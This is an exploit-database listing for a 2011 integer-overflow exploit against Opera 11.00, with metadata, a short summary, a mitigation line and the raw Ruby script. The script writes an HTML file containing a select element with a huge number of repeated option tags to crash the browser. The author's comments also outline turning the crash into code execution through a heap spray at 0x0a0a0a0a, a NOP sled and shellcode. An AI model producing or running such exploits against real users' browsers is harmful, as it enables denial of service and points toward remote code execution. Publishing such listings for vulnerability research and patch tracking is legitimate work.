header-logo
Suggest Exploit
vendor:
Opera Web Browser
by:
C4SS!0 G0M3S
7.5
CVSS
HIGH
Integer Overflow
190
CWE
Product Name: Opera Web Browser
Affected Version From: 11
Affected Version To: 11
Patch Exists: YES
Related CWE: N/A
CPE: a:opera_software:opera
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WIN-XP SP3 PORTUGUESE BRAZILIAN
2011

Exploit Integer Overflow Opera Web Browser 11.00

This exploit is only a Denial of Service in opera web browser. It creates a poc using heap spray that allow code execution, but the author does not post it because it can be used for evil. The exploit creates a HTML file with a select tag containing a large number of option tags with the same content. This causes an integer overflow in the program, leading to a Denial of Service.

Mitigation:

Update to the latest version of Opera Web Browser.
Source

Exploit-DB raw data:

#
#
#[+]Exploit Title: Exploit Integer Overflow Opera Web Browser 11.00
#[+]Date: 24\01\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://get12.opera.com/pub/opera/win/1100/int/Opera_1100_int_Setup.exe
#[+]Version: 11.00
#[+]Tested On: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#
#Note:
#This exploit is only a Denial of Service in opera web browser
#I created a poc using heap spray that allow code execution
#but I will not post here because it can be used for evil
#And I do not want that.
#   for you to explore the program you control with the number esi childrens then created using a spray heap address any such
#0a0a0a0a the data in address should be the point to the beginning of the shellcode
#0a0a0a0a => \x90\x90\x90 => and your shellcode
#Then the function mov eax, [esi] places the value in eax then the program call eax  and boom run shellcode !!!!!
#
#
#




print "[*]Creating the Exploit\n"
i = 0
buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n" 

while i<0x4141 
     buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n" 
	 i+=1
end

HTML =
"<html>\n"+
"<body>\n\n"+
"<select>\n\n"

HTML+=buf * 100
HTML += "\n\n\n\</select>\n\n"+
"</body>\n\n\n"+
"</html>\n\n\n\n\n"

f = File.open("Exploit_opera_11.00.html","w")
f.puts HTML
f.close
puts "\n\n\[*]File Created With Sucess"
sleep(1)
puts "[*]Go to my Site www.invasao.com.br!"
sleep(1)